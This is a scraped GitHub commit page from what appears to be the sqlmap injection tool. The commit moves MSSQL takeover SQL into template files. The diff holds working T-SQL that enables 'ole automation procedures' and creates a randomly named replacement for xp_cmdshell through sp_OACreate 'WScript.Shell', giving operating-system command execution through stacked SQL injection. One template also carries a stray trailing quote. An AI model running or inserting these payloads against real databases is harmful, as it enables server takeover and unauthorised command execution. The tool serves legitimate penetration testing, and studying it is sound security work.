Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit fd4cfb0

Browse files
bdamelebdamele
committed
working on #51 
1 parent 7335072 commit fd4cfb0

3 files changed

Lines changed: 17 additions & 14 deletions

File tree

lib/takeover/xp_cmdshell.py

Lines changed: 5 additions & 14 deletions
Original file line numberDiff line numberDiff line change
@@ -41,23 +41,14 @@ def __xpCmdshellCreate(self):
4141
if Backend.isVersionWithin(("2005", "2008")):
4242
logger.debug("activating sp_OACreate")
4343

44-
cmd += "EXEC master..sp_configure 'show advanced options',1;"
45-
cmd += "RECONFIGURE WITH OVERRIDE;"
46-
cmd += "EXEC master..sp_configure 'ole automation procedures',1;"
47-
cmd += "RECONFIGURE WITH OVERRIDE"
44+
cmd = getSPQLSnippet(DBMS.MSSQL, "activate_sp_oacreate")
4845
inject.goStacked(agent.runAsDBMSUser(cmd))
4946

5047
self.__randStr = randomStr(lowercase=True)
51-
self.__xpCmdshellNew = randomStr(lowercase=True)
52-
self.xpCmdshellStr = "master..xp_%s" % self.__xpCmdshellNew
53-
54-
cmd = "DECLARE @%s nvarchar(999);" % self.__randStr
55-
cmd += "set @%s='" % self.__randStr
56-
cmd += "CREATE PROCEDURE xp_%s(@cmd varchar(255)) AS DECLARE @ID int " % self.__xpCmdshellNew
57-
cmd += "EXEC sp_OACreate ''WScript.Shell'',@ID OUT "
58-
cmd += "EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 "
59-
cmd += "EXEC sp_OADestroy @ID';"
60-
cmd += "EXEC master..sp_executesql @%s" % self.__randStr
48+
self.__xpCmdshellNew = "xp_%s" % randomStr(lowercase=True)
49+
self.xpCmdshellStr = "master..%s" % self.__xpCmdshellNew
50+
51+
cmd = getSPQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self.__randStr, XP_CMDSHELL_NEW=self.__xpCmdshellNew)
6152

6253
if Backend.isVersionWithin(("2005", "2008")):
6354
cmd += ";RECONFIGURE WITH OVERRIDE"

procs/mssqlserver/activate_sp_oacreate.txt

Lines changed: 4 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,4 @@
1+
EXEC master..sp_configure 'show advanced options',1;
2+
RECONFIGURE WITH OVERRIDE;
3+
EXEC master..sp_configure 'ole automation procedures',1;
4+
RECONFIGURE WITH OVERRIDE"

procs/mssqlserver/create_new_xp_cmdshell.txt

Lines changed: 8 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,8 @@
1+
DECLARE @%RANDSTR% nvarchar(999);
2+
set @%RANDSTR%='
3+
CREATE PROCEDURE %XP_CMDSHELL_NEW%(@cmd varchar(255)) AS DECLARE @ID int
4+
EXEC sp_OACreate ''WScript.Shell'',@ID OUT
5+
EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1
6+
EXEC sp_OADestroy @ID';
7+
EXEC master..sp_executesql @%RANDSTR%
8+

0 commit comments

Comments
 (0)